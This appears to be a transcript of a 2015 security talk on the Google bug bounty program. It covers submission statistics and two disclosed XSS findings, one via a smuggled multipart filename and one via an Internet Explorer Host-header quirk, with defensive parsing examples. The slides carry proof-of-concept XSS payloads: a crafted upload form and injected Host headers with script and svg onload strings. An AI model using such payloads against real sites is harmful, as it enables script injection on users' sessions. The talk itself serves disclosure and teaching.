Google Bug Bounty - Michał Bentkowski

OWASP meetup 10/09/2015

Tech Space guests

September 10, 2015

Transcript

  1. About
     Google Bug Bounty - is it worth it or just a waste of time?
     (questions: http://bentkowski.info/q)
     • Michał Bentkowski
     • Pentester @ securitum.pl
     • IT security interests:
       • Client-side issues,
       • Browser quirks,
     • Top 10 Google VRP reporters in 2014
     • Social:
       • Blog: blog.bentkowski.info
       • @SecurityMB
       • sekurak.pl (PL)

  2. Presentation Plan
     • Organisational:
       • What’s bug bounty all about,
       • Why bug bounty? Why Google?
       • Bug submission process,
       • Bug statistics
     • Technical:
       • „Lucky” bug
       • XSS via file upload,
       • XSS via Host header

  3. Questions…
     • Major hearing loss :(
     • Please ask questions at http://bentkowski.info/q
     • Question time at the end of the presentation

  4. About Bounties
     • Deal between companies and security researchers,
     • Lots of bug bounty programs,
     • Google Vulnerability Reward Program (VRP): https://www.google.pl/about/appsecurity/reward-program/

  5. Little History
     • Started doing bounties in 2013
     • Chosen Google:
       • Good reputation
       • Good payments
  6-8. Bug Submission
     • http://goo.gl/vulnz/
  9. Timeline
     • Usually 1-5 days to „Nice catch!”
     • Bounty confirmation within another week (Wednesday morning)
     • Payment: 2-3 months

  10. Some Statistics
     [Chart: counts per year for 2013, 2014 and 2015, y-axis 0-10; the bar values are not recoverable from the transcript]

  11. Some Statistics
     Bug class        Count
     Clickjacking     1
     Path traversal   1
     Cookie folding   1
     RCE              1
     CSRF             1
     XSS              13
  12. Outdated Software
     • QuickOffice - mobile productivity suite
     • Acquired by Google in 2012
     • Incorporated into Google Docs in 2014
     • But they’re not dead…

  13-16. Outdated Software
     • issues.quickoffice.com and issues2.quickoffice.com hosted JIRA
     • https://confluence.atlassian.com/jira/jira-security-advisory-2014-02-26-445188412.html
  17. XSS via File Upload
     • My favourite XSS
     • Postini Header Analyzer (http://www.google.com/postini/headeranalyzer)
     • Wikipedia: „Postini was an e-mail, Web security, and archiving service owned by Google since 2007. It provided cloud computing services for filtering e-mail spam and malware (before it was delivered to a client's mail server), offered optional e-mail archiving, and protected client networks from web-borne malware.”
     Example X-pstn headers shown on the slide:
         X-pstn-levels: (S: 0.00000/60.95723 CV:99.9000 R:95.91080 P: 95.91081 M:64.93900 C:93.23770 )
         X-pstn-settings: 5 (2.00000:8.00000) r p M c

  18. XSS via File Upload
     • But it’s XSS via an upload form…
     • So there is always an upload dialog box.
     • The attack scenario?
       • The attacker sends a maliciously crafted ZIP file to the victim,
       • The attacker needs to lure the victim into the vulnerable page,
       • The victim needs to click on the upload button, then MANUALLY select the file (s)he was given by the attacker,
       • The victim needs to confirm the upload.

  19. XSS via File Upload
     • Can we make an upload in such a way that the server sees it as a file upload, while from the browser’s perspective it is a typical POST form?

  20. XSS via File Upload
     • This application actually splits the string on semicolons.
     • Form field:
         <input name="file_1; name=file_1; filename=test.zip; a">
     • Resulting part header in the multipart body:
         Content-Disposition: form-data; name="file_1; name=file_1; filename=test.zip; a"
     • After the split on ';', the server sees name=file_1 and filename=test.zip.
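The parsing difference slide 20 relies on, reconstructed as an added example (this is not the presenter's code and not the Postini implementation, whose source is not public): a naive parser that splits the Content-Disposition header on ';' without honouring quotes, next to one that uses the standard library's quoted-parameter parser. The header strings are constructed from the form field on the slide.

```python
# Added example: naive vs. quote-aware parsing of a multipart Content-Disposition
# header. The naive variant reconstructs the behaviour the slide attributes to
# the application; the headers below are constructed for the demonstration.
import email.message

# What a browser sends for <input name="file_1; name=file_1; filename=test.zip; a">
SMUGGLED = 'form-data; name="file_1; name=file_1; filename=test.zip; a"'
# A plain text field and a genuine file part, for comparison.
PLAIN = 'form-data; name="comment"'
REAL_FILE = 'form-data; name="file_1"; filename="test.zip"'


def naive_parse(header: str) -> dict:
    """Split on ';' and then on '=' without honouring double quotes.
    A ';' inside the quoted field name is treated as a parameter separator,
    so parameters smuggled inside the name become real parameters."""
    params = {}
    for part in header.split(";")[1:]:
        key, eq, value = part.strip().partition("=")
        if eq:
            params[key.strip().lower()] = value.strip().strip('"')
    return params


def robust_parse(header: str) -> dict:
    """Parse with the stdlib RFC 2045 parameter parser: a quoted value is kept
    intact, so a ';' inside the quotes is data, not a separator."""
    msg = email.message.Message()
    msg["Content-Disposition"] = header
    params = msg.get_params(header="content-disposition")
    # params[0] is the disposition type itself ('form-data'); the rest are parameters
    return {key.lower(): value for key, value in params[1:]}


def is_file_part(params: dict) -> bool:
    """A multipart part is a file upload only if it carries a filename parameter."""
    return "filename" in params


if __name__ == "__main__":
    for label, header in (("smuggled", SMUGGLED), ("plain", PLAIN), ("file", REAL_FILE)):
        print(label, "naive:", naive_parse(header), "file?", is_file_part(naive_parse(header)))
        print(label, "robust:", robust_parse(header), "file?", is_file_part(robust_parse(header)))
```

With the naive parser the smuggled header yields `filename=test.zip` and is classified as a file upload, while the quote-aware parser returns a single `name` parameter whose value happens to contain semicolons. The fix on the server side is simply to use a parser that understands quoted strings, and to decide "is this a file?" only from a `filename` parameter that the parser itself produced.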
  21. XSS via File Upload
     • Chrome tried to interpret the data in some encoding.
     • Unknown byte sequence in that encoding? HTML-entity that!
     • 0x00 - 0x9F: allowed bytes
     • Rest (0xA0 - 0xFF): forbidden bytes (characters)
     • Problem with ZIP. Why not TAR?

  22. XSS via File Upload
     • GZIP structure:
       • 10-byte header,
       • Body containing the DEFLATE stream,
       • 8-byte footer: CRC32 checksum and original file length
     • 10-byte header: no forbidden characters
     • 8-byte footer: easy to get rid of forbidden characters,
     • Body?
     • https://github.com/molnarg/ascii-zip
     • „A deflate compressor that emits compressed data that is in the [A-Za-z0-9] ASCII byte range.”
  23. XSS via File Upload
     Proof-of-concept form from the slide (the tarfile string is truncated on the slide):
         <html>
         <body>
         <form action="http://www.google.com/postini/headeranalyzer/" method="POST" enctype="multipart/form-data">
           <input type="hidden" name="x; name=file_1; filename=abc.tar.gz; " id="vulnerable" value="" />
           <input type="submit" value="XSS @ google.com" />
         </form>
         <script>
           var tarfile = "\x1f\x8b \x08AAAAAAAD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAt33wWDtDDDtGDtswDDwG0stpDDtGwwDDwwD33333sw033333 gFPqImO\x7f[AWg{Wcs]c{KwoaYQ} HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHiiiueeAHiiiMuUAHi iiiyeAHiiiiiiiiiiuAYyeuYYeMEUuAiYeeuYHAiHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH_OocwHiiGSHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOockkHHHHHHHHHH HHHHHHHHHHHHHHHHHiiiiiiAHiiiiiiAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHHHHHHHHCKOoq\\HH...HHHH\x08df\x0e\x1a\x0b\x08\x00\x00";
           var vuln = document.getElementById('vulnerable');
           vuln.value = tarfile;
         </script>
         </body>
         </html>

  24. XSS via File Upload
     Demo video: https://www.youtube.com/watch?v=jiQOYGXxw14

  25. XSS via File Upload
     • Lessons learnt?
     • Always try to find quirks in web servers; they may behave in a non-standard way.
     • When something doesn’t work in one browser, try the others.

  26. XSS via Host Header
     • Known misbehaviour of Internet Explorer
     • Found by Sergey Bobrov (@black2fan) in 2013
     • Found some quirk in Google’s parsing of the Host header
     • Let the hunting begin!

  27. XSS via Host Header
     Response with a normal redirect:
         HTTP/1.1 302 Found
         Date: Fri, 06 Mar 2015 08:35:32 GMT
         Server: Apache/2.2.22 (Debian)
         X-Powered-By: PHP/5.4.36-0+deb7u3
         Location: http://example.com/login.php
         Vary: Accept-Encoding
         Content-Length: 0
         Connection: close
         Content-Type: text/html

  28. XSS via Host Header
     The same redirect with the slash in the Location percent-encoded:
         HTTP/1.1 302 Found
         Date: Fri, 06 Mar 2015 08:35:32 GMT
         Server: Apache/2.2.22 (Debian)
         X-Powered-By: PHP/5.4.36-0+deb7u3
         Location: http://example.com%2Flogin.php
         Vary: Accept-Encoding
         Content-Length: 0
         Connection: close
         Content-Type: text/html

  29. XSS via Host Header
     The request Internet Explorer then makes (note the Host header):
         GET /login.phphp/ HTTP/1.1
         Accept: text/html, application/xhtml+xml, */*
         Accept-Language: pl-PL
         User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
         Accept-Encoding: gzip, deflate
         Host: example.com/login.php
         DNT: 1
         Connection: Keep-Alive
         Cache-Control: no-cache

  30. XSS via Host Header
     • Google Host header parsing:
       • Host: www.google.com -> works
       • Host: www.google.com/test -> doesn’t work
       • Host: www.google.com:80 -> works
       • Host: www.google.com:80<anything> -> also works!
  31. XSS via Host Header
     Response header:
         Location: https://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b%3c%2ftextarea%3e%3cscript%3ealert(1)%3c%2fscript%3e
     Request header that produced it:
         Host: www.google.com:443/cse/tools/create_onthefly;</textarea><script>alert(1)</script>
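The parsing rules from slide 30 and the redirect from slide 31, as an added example (Google's server code is not public, so the lenient parser is reconstructed from the four cases on the slide; the allowlist and function names are my own): a lenient Host parser that accepts anything after the port, a strict one that validates `host[:port]` against an allowlist, and the two ways of building a Location header from it.

```python
# Added example: lenient vs. strict Host header handling and the Location
# header built from it. Lenient rules are reconstructed from the slide; the
# allowlist is an assumed deployment setting.
import re
from urllib.parse import quote

# reg-name (letters, digits, '.', '-'), optionally ':' and a port, and nothing else.
STRICT_HOST = re.compile(
    r"^(?P<host>[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(?::(?P<port>\d{1,5}))?$"
)
ALLOWED_HOSTS = {"www.google.com"}  # assumed: the hosts this server is configured to serve


def lenient_accepts(value: str) -> bool:
    """Routing behaviour inferred from slide 30: the part before the first ':'
    must look like a hostname; whatever follows the port is ignored."""
    host, _, _ = value.partition(":")
    return bool(host) and "/" not in host


def strict_host(value: str):
    """Return the canonical 'host[:port]' or None if the header is malformed,
    the port is out of range, or the host is not one we serve."""
    m = STRICT_HOST.match(value)
    if not m:
        return None
    host = m.group("host").lower()
    port = m.group("port")
    if host not in ALLOWED_HOSTS:
        return None
    if port is not None and not 1 <= int(port) <= 65535:
        return None
    return host if port is None else f"{host}:{port}"


def unsafe_location(raw_host: str, path: str) -> str:
    """Reconstruction of the pattern on slide 31: the raw Host value is
    percent-encoded straight into Location. The encoded ':' and '/' are what
    the browser quirk later turns back into a path."""
    return "https://" + quote(raw_host, safe="") + path


def safe_location(raw_host: str, path: str) -> str:
    """Validate first and only ever emit an allowlisted canonical host."""
    host = strict_host(raw_host)
    if host is None:
        raise ValueError("rejected Host header")
    return "https://" + host + path


if __name__ == "__main__":
    for candidate in ("www.google.com", "www.google.com/test",
                      "www.google.com:80", "www.google.com:80<anything>"):
        print(f"{candidate!r}: lenient={lenient_accepts(candidate)} strict={strict_host(candidate)!r}")
    print(unsafe_location("www.google.com:443/cse/tools", ""))
    print(safe_location("www.google.com:443", "/cse/tools"))
```

`urllib.parse.quote` emits uppercase hex where the slide's encoder used lowercase; the shape of the resulting Location is the same. The point to take from the strict variant is that a Host header is attacker-controlled input like any other: validate it against the hosts you actually serve, and never echo the raw value into Location, absolute links or cache keys.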
  32. XSS via Host Header
     Internet Explorer normalises the first URL to the second:
         http://test.pl/<svg/onload=alert(1)/../../
         http://test.pl/

  33. XSS via Host Header
     Response header:
         Location: https://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b%3c%2ftextarea%3e%3csvg%2fonload%3dalert%28document%2edomain%29%3e%3b%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
     Request header that produced it:
         Host: www.google.com:443/cse/tools/create_onthefly;</textarea><svg/onload=alert(document.domain)>;/../../../../../../../../../../../../../../

  34. XSS via Host Header
     Demo video: https://www.youtube.com/watch?v=9A44ERoAFkc

  35. XSS via Host Header
     • Lessons learnt?
     • The same as before! Find browser quirks on your own or learn about them,
     • Try to find weaknesses in servers.

  36. Summary
     • I really enjoy my participation in Google VRP,
     • Great way to enhance my skills as well as to get some money,
     • Learn about browsers, try to fuzz servers,
     • Be a bit lucky!